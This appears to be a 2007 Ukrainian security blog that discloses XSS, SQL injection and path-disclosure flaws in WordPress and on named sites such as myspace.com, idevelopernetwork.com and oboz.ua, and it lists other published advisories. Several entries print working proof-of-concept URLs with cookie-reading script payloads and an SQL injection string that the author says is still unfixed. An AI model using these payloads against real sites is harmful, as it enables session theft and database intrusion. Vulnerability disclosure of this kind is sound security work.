Websecurity - Веб безпека

В листопаді, 06.11.2007, я знайшов дві Cross-Site Scripting уразливості в WordPress. Дірки в файлах post.php та page-new.php в параметрі popuptitle (вразливий код знаходиться в трьох інших файлах, що завантажуються даними скриптами).

XSS:

http://site/wp-admin/post.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22
http://site/wp-admin/page-new.php?popuptitle=%22%20style=%22xss:expression(alert(document.cookie))%22

Це приклади для Internet Explorer. Для виконання коду в Mozilla та Firefox може бути використаний “-moz-binding”.

Вразливі версії WordPress <= 2.0.9. Версія WP 2.0.11 не вразлива.

14.04.2007

Нещодавно, 11.04.2007, я знайшов нову Cross-Site Scripting уразливість на популярному порталі http://myspace.com. Про що найближчим часом сповіщу адміністрацію порталу.

Також в той же день я вислав деталі про цю уразливість організаторам проекту Місяць багів в MySpace. Знайдена дірка є варіантом обходу фільтрів в HTML Injection уразливості опублікованій на десятий день Місяця багів в MySpace. Котра дозволяє виконати XSS атаку.

Раніше я вже писав про інші уразливості на myspace.com.

Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

22.12.2007

XSS:

POST запит в параметрі zip на сторінці http://events.myspace.com/ index.cfm?fuseaction=events:

MySpace_XSS_exploit2

MySpace_XSS_exploit3

Дана уразливість вже виправлена.

Ще в червні була виявлена SQL Injection уразливість в WordPress. І до цієї дірки був розроблений експлоіт. Дірка в файлі xmlrpc.php.

• Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit (деталі)

Вразлива версія WordPress 2.2. Ні попередні версії, ні наступні не вразливі до даної SQL ін’єкції.

В даній добірці уразливості в веб додатках:

• High Risk Flaw in Sun’s Java Web Start (деталі)
• AgerMenu 0.01 (top.inc.php rootdir) Remote File Include Vulnerability (деталі)
• WebMatic 2.6 (index_album.php) Remote File Include Vulnerability (деталі)
• Ability to inject and execute any code as root in SysCP (деталі)
• XLNC1 Radio Classical Music Nuke Portal Remote File Inc. Vuln. (деталі)
• remote file include in whm (all version) (деталі)
• SQL injection in BtitTracker (деталі)
• KDE 3.5 (libkhtml) <= 4.2.0 / Unhandled HTML Parse Exception Exploit (деталі)
• Multiple vulnerabilities in chetcpasswd 2.4.1 (деталі)
• SQL-ін’єкція в SoftAcid Link Exchange Lite (деталі)
• Обхід каталогу в aBitWhizzy (деталі)
• Multiple cross-site scripting (XSS) vulnerabilities in Omniture SiteCatalyst (деталі)
• Variable overwrite vulnerability in PHP-Update (деталі)
• Міжсайтовий скриптінг в cPanel (деталі)
• Міжсайтовий скриптінг і SQL-ін’єкція в Enthrallweb eHomes (деталі)

Нещодавно, 07.12.2007, я знайшов нові Cross-Site Scripting уразливості в WordPress. Дірки в файлах plugins.php та plugin-editor.php. Вразливі WordPress 2.0.7 і попередні версії.

XSS:

http://site/wp-admin/plugins.php?action=activate&plugin=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/plugins.php?action=deactivate&plugin='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/wp-admin/plugin-editor.php?newcontent=%27%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=update&file=akismet/akismet.php

В минулому році я вже писав про подібні уразливості в WordPress. Тому дані уразливості - це доповнення до раніше знайдених мною дір в WP 2.0.x. У версії WordPress 2.0.9 вони вже виправлені.

28.07.2007

У січні, 31.01.2007, я знайшов Cross-Site Scripting, SQL DB Structure Extraction та SQL Injection уразливості на сайтіі http://www.idevelopernetwork.com. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

20.12.2007

XSS:

• alert(document.cookie) (IE)
• цікавий (IE)

SQL DB Structure Extraction:

http://www.idevelopernetwork.com/resources/index.html?q=%27

SQL Injection:

http://www.idevelopernetwork.com/resources/index.html?q=%27%20OR%20LINKDESC%20LIKE%20%27

Дані уразливості досі не виправлені. Що дуже несерйозно.

Ще в минулому році, були оприлюднені SQL Injection та Full path disclosure уразливості в WordPress. Вразливі (до SQL ін’єкцій) версії WordPress 2.0.2 і 2.0.5.

• Sql Injection and Path Disclosoure Wordpress v2.0.5 (деталі)

SQL ін’єкції в файлі index.php (в 2.0.2 та 2.0.5). Більш нові версії WP невразливі до даних SQL Injection.

А ось зазначені Full path disclosure (49 дірок) актуальні й в самих останніх версіях движка - тобто в усіх версіях WordPress 2.x є подібні уразливості (в залежності від версії движка кількість вразливих файлів різниться). Тому що розробники движка досі не виправили і не планують виправляти ці дірки (я сам неодноразово звертав їхню увагу на Full path disclosure в WP, але вони вирішили їх не виправляти).

В даній добірці уразливості в веб додатках:

• PHP remote file inclusion vulnerability in Simple Invoices (деталі)
• SQL injection vulnerability in Noname Media Photo Galerie Standard (деталі)
• Multiple vulnerabilities in Zina (деталі)
• Multiple vulnerabilites in Nokia Intellisync Mobile Suite & Wireless Email Express (деталі)
• IBM Tivoli Provisioning Manager for OS Deployment TFTP Blocksize DoS Vulnerability (деталі)
• Maian Recipe 1.0 (path_to_folder) Remote File Include Vulnerability (деталі)
• OTSCMS <= 2.1.5 (SQL/XSS) Multiple Remote Vulnerabilities (деталі)
• SQL-ін’єкція в Powies PSCRIPT pMM (деталі)
• Updated kdelibs packages fix KHTML vulnerability (деталі)
• Multiple PHP remote file inclusion vulnerabilities in ExtCalThai (com_extcalendar) component for Mambo (деталі)
• PHP remote file inclusion vulnerability in JumbaCMS 0.0.1 (деталі)
• Star FTP Server 1.10 (RETR) Remote Denial of Service Exploit (деталі)
• Міжсайтовий скриптінг та інклюдинг локальних файлів в Vikingboard (деталі)
• Відмова в обслуговуванні в ProFTPD (деталі)
• Oracle <= 9i / 10g File System Access via utl_file Exploit (деталі)

Два дні тому, 16.12.2007, була оприлюднена Information Leakage уразливість в WordPress. Вразлива версія WordPress 2.3.1 (і потенційно попередні версії).

PoC:

http://site/'wp-admin/

Уразливість в файлі query.php. Вона пов’язана з тим, що WP в деяких випадках перевіряє права користувача на огляд сайту (чи є даний користувач адміном) по URL. І якщо сформувати його відповідним чином (вставити в урл рядок “wp-admin/”), то можна отримати права адміна на огляд деякої інформації. Зокрема чорнеток - постів, що мають статус draft.

• Wordpress - Broken Access Control (деталі)

Я перевірив цю дірку в WP 2.0.x і вона не спрацювала. Можливо вона спрацює на більш нових версіях движка.

26.07.2007

У січні, 31.01.2007, я знайшов Cross-Site Scripting та Full path disclosure уразливості на популярному проекті http://oboz.ua (онлайн ЗМІ). Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

18.12.2007

XSS:

• alert(document.cookie)
• цікавий
• html включення

Full path disclosure:

http://oboz.ua/cgi-bin/search.cgi?to=40-&from=21&id=539 (виправлена)

http://oboz.ua/cgi-bin/search.cgi?to=40&from=21-&id=539

http://oboz.ua/cgi-bin/search.cgi?to=40&from=21&id=539-

Дані уразливості (окрім одної) досі не виправлені.